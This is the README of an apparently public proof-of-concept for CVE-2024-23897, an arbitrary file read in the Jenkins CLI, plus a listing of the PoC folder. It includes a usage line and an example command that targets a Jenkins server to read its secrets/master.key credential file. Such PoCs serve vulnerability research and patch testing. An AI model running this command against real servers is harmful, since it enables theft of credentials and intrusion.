Jenkins CLI arbitrary read (CVE-2024-23897 applies to versions below 2.442 and LTS 2.426.3)Read first 3 lines of any file with read permission for current user on the system.
The script is using proxychains internally.
Usage:
`python CVE-2024-23897.py <jenkins-cli.jar path> <target URI> <file path>`
Example:
`python CVE-2024-23897.py /mnt/hgfs/Share/jenkins-cli.jar http://10.10.14.8:8080/ /var/lib/jenkins/secrets/master.key`
[4.0K] /data/pocs/4bebaf18947bb5a1edce4066b13d00b41aa60f50
├── [2.1K] CVE-2024-23897.py
└── [ 339] README.md
0 directories, 2 files